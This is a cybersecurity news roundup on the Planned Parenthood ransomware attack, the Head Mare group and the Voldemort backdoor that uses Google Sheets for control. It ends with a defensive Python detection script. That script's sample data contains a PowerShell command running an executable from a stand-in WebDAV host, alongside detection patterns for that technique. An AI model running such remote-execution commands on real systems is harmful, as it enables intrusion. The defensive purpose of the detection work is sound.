Planned Parenthood Confirms Cyber Attack, Cybercriminals Exploit Google Sheets: Your Cybersecurity Roundup
Planned Parenthood Confirms Cyber Attack
Planned Parenthood of Montana has confirmed a cyberattack on its IT systems, prompting an investigation and response from federal law enforcement. RansomHub, a ransomware group, has claimed responsibility for the attack and threatened to leak 93GB of stolen data.
The incident highlights the increasing vulnerability of healthcare organizations to cyberattacks. While the full extent of the breach is still being assessed, the potential consequences for patient privacy and data security are significant.
As the investigation unfolds, it is crucial to monitor the situation closely and ensure that appropriate measures are taken to mitigate any potential harm.
Head Mare Hacktivist Group Targets Russian and Belarusian Organizations
A sophisticated hacktivist group, known as Head Mare, has emerged as a significant threat to organizations in Russia and Belarus. The group leverages advanced techniques and tools to infiltrate networks, steal sensitive data, and disrupt operations.
Head Mare exclusively targets organizations within Russia and Belarus, likely motivated by the ongoing geopolitical conflict. The group exploits recent vulnerabilities such as CVE-2023-38831 to gain initial access to target systems.
The group employs custom-made malware such as PhantomDL and PhantomCore for remote access and data exfiltration. Additionally, Head Mare uses publicly available tools like Sliver, rockstar, ngrok, and Mimikatz to facilitate its attacks.
After gaining access to target systems, Head Mare encrypts victim data using LockBit or Babuk ransomware and demands a ransom for decryption. This can lead to significant disruptions and financial losses for targeted organizations.
Cybercriminals Exploit Google Sheets for Malware Control
A sophisticated cyber espionage campaign has been uncovered, utilizing Google Sheets as a command-and-control (C2) mechanism to target organizations worldwide. The campaign, detected by Proofpoint, impersonates tax authorities to lure victims into clicking on malicious links that ultimately deliver a custom backdoor known as Voldemort.
The attackers employ a multi-stage attack chain, starting with phishing emails that redirect victims to a landing page designed to determine their operating system. For Windows users, the landing page displays a malicious LNK file disguised as a PDF. Once executed, the LNK file leverages PowerShell and WebDAV to download and execute the Voldemort malware.
Voldemort is a sophisticated backdoor capable of gathering system information, exfiltrating data, and executing commands remotely. The malware utilizes Google Sheets as a C2 server, allowing attackers to maintain covert control over infected systems.
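For defenders, the chain described above (PowerShell pulling a payload over WebDAV, then a backdoor talking to Google Sheets) suggests two hunting heuristics. The following is an added example, not code from Proofpoint or the original roundup; the event fields, host names, process allow-list and the use of the public Sheets API host are assumptions made for illustration.

```python
import re

# Constructed sample events, not real telemetry; field names are assumptions.
EVENTS = [
    {"type": "process", "host": "ws-01", "image": "powershell.exe",
     "cmdline": r'powershell.exe -Command "& \\dav.example.net@SSL\DavWWWRoot\share\tool.exe"'},
    {"type": "process", "host": "ws-02", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"type": "network", "host": "ws-01", "image": "tool.exe",
     "dest": "sheets.googleapis.com"},
    {"type": "network", "host": "ws-03", "image": "chrome.exe",
     "dest": "sheets.googleapis.com"},
]

# Assumption: local allow-list of processes expected to talk to Google Sheets.
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Public Google Sheets API host; the exact endpoint used is not given on the page.
SHEETS_HOSTS = {"sheets.googleapis.com"}
# UNC forms served by the Windows WebDAV redirector: \\host\DavWWWRoot\ or \\host@SSL\
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+(\\davwwwroot\\|@ssl(@\d+)?\\)", re.I)


def reasons(ev):
    """Return the heuristics a single event trips (empty list if none)."""
    hits = []
    if ev["type"] == "process" and "powershell" in ev["image"].lower():
        if WEBDAV_UNC.search(ev["cmdline"]):
            hits.append("powershell-webdav-unc")
    if ev["type"] == "network" and ev["dest"].lower() in SHEETS_HOSTS:
        if ev["image"].lower() not in EXPECTED_CLIENTS:
            hits.append("non-browser-google-sheets")
    return hits


def triage(events):
    """Group findings by host; a host with both findings matches the whole chain."""
    by_host = {}
    for ev in events:
        for hit in reasons(ev):
            by_host.setdefault(ev["host"], set()).add(hit)
    return by_host


if __name__ == "__main__":
    for host, hits in triage(EVENTS).items():
        print(host, sorted(hits))
```

Either finding alone can be legitimate (sync clients and scripts also reach Google Sheets), so the allow-list needs tuning per environment before alerting on it.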